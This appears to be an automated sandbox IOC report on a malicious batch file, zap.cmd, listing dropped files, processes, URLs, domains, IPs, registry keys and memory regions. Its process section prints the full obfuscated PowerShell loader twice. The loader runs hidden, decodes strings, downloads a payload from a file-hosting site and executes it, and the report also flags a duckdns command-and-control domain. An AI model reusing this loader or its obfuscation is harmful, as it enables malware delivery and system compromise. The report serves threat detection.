IOC Report
zap.cmd

loading gif

Files

File Path
Type
Category
Malicious
zap.cmd
ASCII text, with very long lines (6428), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t0oza4b.equ.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wkmyrx3.t4j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrriaff2.3le.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upabvupi.4vk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Belejringstilstandenes.Unj
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EOGWFIPGPL7TCFT7EKZ8.temp
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
xgmn934.duckdns.org
malicious
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52
unknown
http://nuget.org/NuGet.exe
unknown
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92
unknown
https://www.sendspace.com/pro/dl/wyg3h5
172.67.170.105
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://fs13n3.sendspaX
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://fs03n3.sendspace.com/m6
unknown
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H
unknown
http://www.sendspace.com
unknown
https://www.sendspace.com/pro/dl/5m5a1uP
unknown
https://github.com/Pester/Pester
unknown
https://www.sendspace.com
unknown
https://www.sendspace.com/pro/dl/wyg3h5z
unknown
https://fs03n3.sendspace.com/
unknown
http://crl.micro
unknown
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe
unknown
https://aka.ms/pscore6lB
unknown
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin
69.31.136.17
https://fs03n3.sendspace.com/I6
unknown
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb
69.31.136.57
http://fs13n3.sendspace.com
unknown
https://fs13n3.sendspace.com
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.sendspace.com/pro/dl/5m5a1uXRul
unknown
https://www.sendspace.com/pro/dl/5m5a1u
172.67.170.105
https://www.sendspace.com/pro/dl/wyg3h5j83
unknown
There are 25 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
xgmn934.duckdns.org
12.202.180.134
malicious
fs13n3.sendspace.com
69.31.136.57
fs03n3.sendspace.com
69.31.136.17
www.sendspace.com
172.67.170.105

IPs

IP
Domain
Country
Malicious
12.202.180.134
xgmn934.duckdns.org
United States
malicious
69.31.136.17
fs03n3.sendspace.com
United States
172.67.170.105
www.sendspace.com
United States
69.31.136.57
fs13n3.sendspace.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5EA6000
trusted library allocation
page read and write
malicious
2046AEC5000
trusted library allocation
page read and write
malicious
A036000
direct allocation
page execute and read and write
malicious
25F31000
trusted library allocation
page read and write
malicious
4FE6000
remote allocation
page execute and read and write
malicious
8BF0000
direct allocation
page execute and read and write
malicious
7930000
trusted library allocation
page read and write
2045B2F4000
trusted library allocation
page read and write
2045B6DB000
trusted library allocation
page read and write
A680000
direct allocation
page read and write
8A2C000
stack
page read and write
2046AE51000
trusted library allocation
page read and write
8C00000
direct allocation
page read and write
2FF9000
heap
page read and write
2820B000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
2045CE71000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
28450000
trusted library allocation
page read and write
2046AE71000
trusted library allocation
page read and write
20473002000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
2045B2F6000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
7280000
direct allocation
page read and write
7AD0000
trusted library allocation
page read and write
6926839000
stack
page read and write
A410000
heap
page read and write
5324000
trusted library allocation
page read and write
31EF000
stack
page read and write
2045B2E0000
trusted library allocation
page read and write
2821E000
trusted library allocation
page read and write
69265FE000
stack
page read and write
2CFE000
stack
page read and write
A5C3000
heap
page read and write
2FAD000
stack
page read and write
7958000
trusted library allocation
page read and write
25CF0000
heap
page read and write
20458E00000
heap
page read and write
81E6000
remote allocation
page execute and read and write
2045A920000
trusted library allocation
page read and write
255A0000
direct allocation
page read and write
3270000
trusted library allocation
page execute and read and write
28460000
trusted library allocation
page read and write
8C30000
direct allocation
page read and write
7B00000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
25580000
direct allocation
page read and write
78D0000
trusted library allocation
page read and write
2045AA00000
heap
page read and write
28470000
trusted library allocation
page read and write
8784000
heap
page read and write
7AB0000
trusted library allocation
page read and write
4B2E000
stack
page read and write
70EE000
stack
page read and write
85ED000
stack
page read and write
3152000
heap
page read and write
25DDE000
stack
page read and write
76E1000
heap
page read and write
2045B2D4000
trusted library allocation
page read and write
28240000
trusted library allocation
page read and write
20459080000
heap
page read and write
5384000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
199A82BB000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
28450000
trusted library allocation
page read and write
8B40000
trusted library allocation
page execute and read and write
6FEE000
stack
page read and write
706E000
stack
page read and write
3267000
trusted library allocation
page execute and read and write
25C50000
remote allocation
page read and write
25DF0000
trusted library allocation
page read and write
6C2C000
stack
page read and write
7FFD9B784000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
2613A000
trusted library allocation
page read and write
32ED000
trusted library allocation
page execute and read and write
284E0000
trusted library allocation
page read and write
325A000
trusted library allocation
page execute and read and write
20473160000
heap
page read and write
4B30000
heap
page execute and read and write
28E5B000
stack
page read and write
8BCD000
stack
page read and write
28F60000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7B20000
trusted library allocation
page read and write
8AAC000
stack
page read and write
6C6E000
stack
page read and write
25F20000
heap
page read and write
53D3000
trusted library allocation
page read and write
20473212000
heap
page read and write
20472E52000
heap
page read and write
293D000
stack
page read and write
7910000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
25E00000
heap
page execute and read and write
A56E000
heap
page read and write
2045CC36000
trusted library allocation
page read and write
32F9000
trusted library allocation
page read and write
2872E000
stack
page read and write
25B5F000
stack
page read and write
2F8F000
unkown
page read and write
7BDB000
stack
page read and write
28470000
trusted library allocation
page read and write
4B98000
trusted library allocation
page read and write
204731A8000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
2045B2DC000
trusted library allocation
page read and write
25590000
direct allocation
page read and write
28470000
trusted library allocation
page read and write
D236000
direct allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page read and write
2045C0E8000
trusted library allocation
page read and write
2813E000
stack
page read and write
8B8E000
stack
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
28490000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
204592A0000
heap
page read and write
25E58000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
8567000
stack
page read and write
3149000
heap
page read and write
204731EB000
heap
page read and write
20472FB2000
heap
page read and write
25F00000
trusted library allocation
page read and write
2045CC1B000
trusted library allocation
page read and write
71FD000
stack
page read and write
3262000
trusted library allocation
page read and write
878C000
heap
page read and write
7250000
direct allocation
page read and write
2045CD1E000
trusted library allocation
page read and write
7A4E000
stack
page read and write
533A000
trusted library allocation
page read and write
286ED000
stack
page read and write
87C6000
heap
page read and write
A6B0000
direct allocation
page read and write
7165000
heap
page execute and read and write
A552000
heap
page read and write
A415000
heap
page read and write
5BF9000
trusted library allocation
page read and write
20473081000
heap
page read and write
7F140000
trusted library allocation
page execute and read and write
32C0000
trusted library section
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
28030000
trusted library allocation
page read and write
2045A9D0000
heap
page read and write
25DF0000
trusted library allocation
page read and write
28351000
heap
page read and write
7AA0000
trusted library allocation
page execute and read and write
260E8000
trusted library allocation
page read and write
29EE000
unkown
page read and write
2045A960000
trusted library allocation
page read and write
308E000
stack
page read and write
28470000
trusted library allocation
page read and write
7FFD9B962000
trusted library allocation
page read and write
20459075000
heap
page read and write
8AEE000
stack
page read and write
199A82B0000
heap
page read and write
A650000
direct allocation
page read and write
A57F000
heap
page read and write
4C57000
trusted library allocation
page read and write
7A0E000
stack
page read and write
25D97000
stack
page read and write
25DF0000
trusted library allocation
page read and write
20473188000
heap
page read and write
28450000
trusted library allocation
page read and write
95E6000
remote allocation
page execute and read and write
A578000
heap
page read and write
20459280000
trusted library allocation
page read and write
20472FFF000
heap
page read and write
870C000
stack
page read and write
2045B30A000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
28450000
trusted library allocation
page read and write
3186000
heap
page read and write
A606000
heap
page read and write
28470000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
A60B000
heap
page read and write
5EA0000
trusted library allocation
page read and write
3230000
trusted library allocation
page read and write
